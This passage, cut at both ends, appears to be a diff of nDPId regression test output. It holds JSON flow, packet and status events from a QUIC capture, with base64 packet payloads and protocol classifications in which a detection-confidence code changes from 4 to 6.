1cBaN\/n0tnPhMblSJyBYOeYoXsn+gmj9b+VHHpisogUCwUgPQms6WZ1Tn+icYaQ+CSAy4kHR6jZ30M6ApyQmmHvzN14vvzh+CT59we\/MSd6bYyHCxqlNxNi9gnxXYBhI44N0AGk0Qqhje+CC0oYc8WWkUM1686AJps19dxQQb1m18EQJq7trGNUuhfyUdSuAwL\/l0h22i0uupo2DPl3o0+7Bt3qwlrzpKyCufm4ZmMAPpvK65nzp6cFH+pmlOQ7s2YRoxtUhnAtjgxag2R4\/nlewGsR9ygeGjxTA5LiirItmkj97AzgWwoIUP9ldEWuIUcvVhLe\/QB8zLa7AJgeB1R4vJAZowIkhS0+EMWrzuyLxX+IfaYE0iHLqkcbQA3BNqXFj4h621k+KIOiP4lvVResrE\/c+w\/Oj5tA1lx4837jiHi0YZT52YvwcFEmqMCZU8XqMRUIGXvjZqo9v4Gwo714AlFrATSjPNB0rwwMyUukaq\/3e3DvrcgQ9NGlBVWFxhz1tqnsLP7Kr\/srqsLf5Bw4wZJQF6sEZW4nlUnupPVa0tpr\/+wGxQCug6xHyGNDxwnWnyjCwM4oE2hnNUNVujvf72\/dvTfU08lPagglVjnYIuPVm74QZYTZRFryAhxJK17r+BPfOlYKd+vVYMtivnHXjiFQVByr8k1Rcm2cpPeLXL3f+bAsmGkc4EG6HjppgudyHK+UV5oHN+m4I6LZs94OtdQcI6RUnBhsNPqFTdenognWR3FDybsz6sXPvUHez6OFefzWFvFSrz6XT7otFR8cdYGpKRwwSfHP\/PrekwOkrlmZijlypd6KXVAl4pAFkRLTGqSWHEA1LRLEvTNukH3xy5z66DEUDlFW01SciuFipPqn91VwpPL0iC6UpfNOoxnK1nHPehbzvx3A9Po2F3NnKEzfe
dfgajLA5\/LmaIHRmUo6B\/KmNXMWBfwWwfMwOtQ+o42gw8mnZvG2Qqex771hctyXZMqH2SJLXmmk6AtETcwF8B6jbJ768elE90Bhjm6anLtIwTYQnbLc4EH5TtLu5+uZ3DUfoYbPMOgeH4lIEDjI0kYQ+7lnl1zdIWgKe+MmglR86en4u4M1jb\/5BPspqYSJQDFVzNKI+9EnvCEh1nm4ZLP5q4L5n4Y\/OfoQNHRw1mNsvzMmZ1LR0N0nXyXURG6oysqTj3iTmd8NZXAVgqVBMCFaGWht6XT+2k4r7buSS+jBPmF7S9tGqU"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"},"quic": {"client_requested_server_name":"media.fmct2-1.fna.whatsapp.net","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"},"quic": {"client_requested_server_name":"media.fmct2-1.fna.whatsapp.net","user_agent":"dev Chrome\/92.0.4503.5 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00742{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501305362,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":165,"packets-processed":164,"total-skipped-flows":0,"total-l4-payload-len":221400,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":104,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":104,"total-idle-flows":101,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":478,"global_ts_msec":1621503088279} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02319{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1621503088279,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621503088279,"pkt":"AAAAAAAAAAEAU0VlCABFAAViNs5AAH4RIneokEAFmWIcTtNoAbsFTmuQxP8AAB0IeGU\/mdbeLGAANwAZh+l9xBKAiSKB2OhrwN\/hzDl51JMe7JNbapPLHMOjmgDUc0Kyw120FAqWdbLajL0G7x+rThpE\/ezHsYo1+wzly8xUgAolT2BsTpI2RHGJFl7PB6kKEbj1oJ2aRfN0feK0OGTrmVtkNP9R+\/rEuFjr\/5ftbiLlMiGuS3H3QpNIn1LP4hRzRdMhEMaL4tpWijpslIEyIWPJUu7rklLDODiHtimhfIO2wkBoYI2kQY+hFw906HJDazA9cw+osFQ\/bzvopugZzilDKv1JaRYx1e4+hqHH6L6B1UH9\/T9\/HnMV2EpDa0Av+iDS3F9RRywHXZAIhY03mMeM7GrJP2Zpz4QhJct7zfEW3x535nQ0edWGlDKJvLXrTJAeOpJnOxJ1r4baAFi3DRD+vKNPYnsuGfuIY65dgPclLbLGQ0fUutzS5iBfTHGDPLr8VDoE6brnwH\/5y9mzczXm\/kEf07xeWOu\/1opIMye\/Yn9rwK9T2MMElD6rrbD6Gahnp2r9RHhIeVU09JhM9hecDnkQZ6178V6oPYtSdjz2mTGsw+LPdfT9S16RCinAfrzSX3fRQtDiS\/0lA192fRii3J2KEljzmCRknudcAIFxTdxxb9A\/G2TbmLeHepNu2Vz0i6tcgUnXVFPrdPymqw79zhx7DrjVNwDXeclunhYwL1E7tG0V3PTUnBzD7E5OrcUKHgdfHTYLI3pYV9K56ZSwrEMPYw6PdTGd6BMaZRgmv1zwBM8F3abkA+q3Zf8DmaTM4yYqUGdqKt\/rsJPP5R8bBJC\/k1fqIhjEgyfV75RWWjvPOT8vpG\/Zf\/Lwho7iMvjqjS6+1DpZLIajkAZ0nPm\/rm87HLI0cdJpxuRH1pwBLDdf8pMJ1mfSHXv93VQKMlba5U2bhfGH1Mqk7jCyOgbhoG\/iErOEjUrAiw7X6OQncJiN9Mkd\/SEm\/\/RWlqvwMLkvGjPHLC5e7V2TGXlnOhRlZBU7qILrPVNtxU7dCPtBdbxIDti1\/YRndJCIPzLPa9h2mTEfoIgDEaAE\/7UawhYqjGFuPu7cykm8DYwvbzLfyH7bht4ex13mlrd\/FiPYOE28osrwhi1PWiAzhV1qXqi4+RWmb\/5CisAguq7jYLc0h5FGHrR92KCTjSdBEZ\/DAyNwtWa8nS6w7j5Hbinu4C0ABTwJE2l7GH4ZQ9omOr49dyeQCQatUwx0VqYJSDhoVCe0TCuJntWa02NbIeePgGo8pWxM6tgM2H8YNfSNUF9avzsSRS2VyMPLnBXpk9KiQb0mc7BEeTRigvV1S+9XKWzbnd+uq94u6ElOSGdKojQAok0wFU1sgFBAgT2mV3C3\/ZQ6n6G68vFnfmO5+ZuiNec\/P1VvDC8vVIjLmaMCjrgt9+jDuswwkMDFQIciL3t4FUlUJM2MVHvkdLHSo3q+qgTRtHtpBlxLgaLGkfaorEJRtfDW1GQLecYh1sTrhehn3QcG
0nR2Ih8nO3MktWlFwRqGrK\/t0Qsdsusr3bQ36R8F1tTznS8ZWGUFNDf+Lfwf1VRU+IBvCx3kULbMabelEKmImDqvXmP2zB2BjWHst539anbYbajQw\/ZgddvVcRhVSUqIpiPQ7wJ7kw9\/TtjeFcmJbCOn4TBNtXEAFcmESf+wEZSMAzbOoMV2uJojX02TEHH7lGyR4dilgOga\/fEzmhXhoDwn+0SuTYueRdcC6yi0FFtVe7SxyfJXa\/en0rOfO5K8UmxsGwQRxH4PjiJBdspE+yoKaJq6B76ZXjWQshEvVjgOi6H1dYlUSyL2zSCF"} -00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501260783,"flow_last_seen":1621501262883,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
-00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501261282,"flow_last_seen":1621501263382,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00750{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 
+00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501260783,"flow_last_seen":1621501262883,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":103,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621501261282,"flow_last_seen":1621501263382,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"202.152.155.121","src_port":61484,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00750{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621501305362,"flow_last_seen":1621501305362,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621503088279,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"16.205.123.234","src_port":51856,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.WhatsAppFiles","breed":"Acceptable","category":"Download"}} 
00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":166,"packets-processed":165,"total-skipped-flows":0,"total-l4-payload-len":222750,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":105,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":105,"total-idle-flows":104,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":485,"global_ts_msec":1621507440293} 00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1621507440293,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621507440293,"pkt":"AAAAAAAAAAEAU0VlCABFAAViN3ZAAH4RIc+okEAFmWIcTsysAbsFTp5qwP8AAB0IikGMkqg\/9wYANwBCbbDOkKE3I8tUrhP0019VoFQ42OGxkeSDSRfCVHVFzGS6OlWzWiT3fji2Q9e2uBbhaayYtc5E\/X007tKAEm9FuNGSPz7TI818Sttxs3ujdp1DhJh+NpZfeeSISitSIGvg2MzufhYYrAjbhnoT1XHoGCBc1rAFUoO7UMuAGYC8SYPLocVC73lmAf9DYHNSe5fUCJSAAH+oZTPgR2yZUUzLo6fywQUMulJGI+tO3nXiCpCmWVZ53dVEiIJeeIojZJHsLSZxfmkzXZWYlR6uPBugjMWutrpp3d5v3AuvY2G7Qyk4Lv7MAfdysMbwBNbNtmNdfZPJ3\/pEPVHOv\/559Dp4RvW50HvpUKtGVrDOqJeFYelmkJNmPICcqoerayf1TiCARBZAnCn0MwD3qiNb6ZcgubQ3lYbFhXEcXw4p1oo9c4om8zLGYKCC6gMxWMZoaZf19pIOW1N7yHt\/SSfp8qPr7X11LuJnuqgknnxWBGr+1wZiL2PTq482lAJ6gF5Z2f2tN3XLZipWQds6Bo6uWSETMHj4LlIoOeoO8q99yIrIxEzO\/f4j83sVtl5ErO58R6yY0ijEedgoeOZWD8SVQDMvzkmLAx1dLgYjNi3zBdewahsS63kzpEcxno1c5HXpfC65SPUfK1u9t7lKXuScst61LMT7gD4xRvgi6ny4pOwNfDlEoBJxFCoaEzFQba0SYnQmz1wlKHdeciad8aWCTIM+4CgIGyXfMd+X+XFoeu3ajcjzAF7n6JeYn14EGnQY8unzlXF4p3i93fMCw\/xlMi\/OJq\/ruw6eUXgNqb3nrxm0BR4ksvgfkB5sFTJQPZzM8zEmRDSqngasEorcI7WMz8C2mGoX59tOv7H86rOq9kc0rL9XtCb+NWplconR2ejygYELbikOOOslKugW2zA2OmoHHi2Na4MTk66Md2Uuf6WcAKyFaaQpjc\/tMudn3z3HXrJde9BcZI846R4IemkxY1\/Z3QY1XcsM91Esz8+Pxd74AMqufrPf4mE2zfMQfa4C4336cepitLI4wuJ1hBcTktGeDMWo3AxuFTPzMyx19tB4Pb+QiQvYM29oIx\/p58YHbJiRBR\/2VW0LXa2VmGF1yjBfbyTyaiW\/0aG3AMd+pDl8N8KLpVPA44wpekrJkebyMJOc8G8y2nyC0MA6L1m0olcRvwsPyg32HFyPdlugxC3gCUDIy+\/UdsTVejDWt8G3KF2zBl5z4vUQG7szc5MTIFEplmTziOxG9vpu8uPAGk3JSUOmEY\/36oGBDkAhxzxaUR5tfsiouiWurq0NGGO0Zerjexoy1X+rM8JONjVsJbya5hJGT1\/EyIrr8IuI\/DXHAAsxAOhU117x75sR1FYPo+cPS2OX2Aq2eYhfspxYNG0jwN\/TrKrZDda9AWe9Yds2HmJkKmWUnQVV7eJUFPO+7T5F\/7VpvLpDyDx3HI9ZxDJv4+lVDYmr4M7ancc8vSp1QL
KUuXa\/RRdLhFE4WpkMwIllcvDn6w2IGiZvdFwwcz0o7+lWiab+FQFJvQj5W6kBnsxHpASo8358\/GjTTHB+z0Y8rY144soNEgilV0+eFQDnbygqPbwyW1XcdsOUsoU+5ncfr9q8EY2mvfVYGA2HoIRLv74rd9Hgq035d00HMutEK92GJr8ZYm+qplcEu7zCn9\/SDJP9SVZthGjepNQwhkU8gZjaxDt0kSAy5LpSeuV57eDXzlO\/myoK40cRqGjj6TY\/1mZZ4XZJntQPKWyMGIHJzxZKIYXKlVPoQnqi25JmgSDVSszE"} -00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
+00924{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":166,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621507440293,"flow_last_seen":1621507440293,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":52396,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"},"quic": {"client_requested_server_name":"dns.google","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621503088279,"flow_last_seen":1621503088279,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621507440293,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"153.98.28.78","src_port":54120,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.DoH_DoT","breed":"Fun","category":"Network"}} 
00609{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":167,"packets-processed":166,"total-skipped-flows":0,"total-l4-payload-len":224100,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":106,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":106,"total-idle-flows":105,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":490,"global_ts_msec":1621516392616} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621516392616,"flow_last_seen":1621516392616,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621516392616,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"126.3.93.89","src_port":50224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1621516392616,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621516392616,"pkt":"AAAAAAAAAAEAS1QMCABFAAViOJBAAH4R+wiokEAFfgNdWcQwAbsFTuapxv8AAB0IERdUk7u04\/YAAEU0aOs+L2NbS8h3vY4IEyDvx9d+UduEUSP3UFQHQG3NjO459splk2VvFwj2AOb7c4buoNQkQrDX9vOCnfv2vAKh3jO4JsUMREjT5vNEDbeeIao\/p5PHGkGHQhyZBJDceMVmmdTd\/uhtDdk+j6PWnF9UbEFtNHo58b9XyfB2nWQ06pT3ZlYQ9WK7gVb0I12TtO\/1JgOp7SeP5Djnc84cBKVneYBg230rYLPChbpIzOYDBN2v71vSy3clCOV3NHQe9++jSFmz01AIsjPo0b7oAK8pqXiYvEW7DTC9VlrG7gxRC86BUuyPkAEhQ20RdVW5Yf10xFe6ayadGDnT237OAKo\/\/+O\/LFyNHbgVfKniSrMFRiGghfY1wLG1Jv\/b0caXf12hI0LoNCqVSPEG+EnSUUM92WSb0C9QePh4RT9rbvZi\/xbgMAiaBMtltwa7agMAD0SUEyPtFV3C+8gLuPxCYmnjIpV33zbnthqAcxQlIZ2vrKiyi+KhmHrNr9GObbxxrlP9ljjIiTHt\/t7pUOT1Y8FS6S3BV52+5yFbyKd0LCCvLS6o06nay2+nbWpq3MMEnIy2ErrDasXDV\/yTFWEtS+9f7sWO92IAVmXzrxbK093nsF5MajPhwq3Yj7enMlLFnsX3TwRJhVqvSkB7sppzgxggdf79L1raj9XW8XM8V4sShlzqKJNXWgV0Ic3AYwyNJp1wBL5vRbaDded8wpXErdg1Guex9BOOifEyh8ItX4yv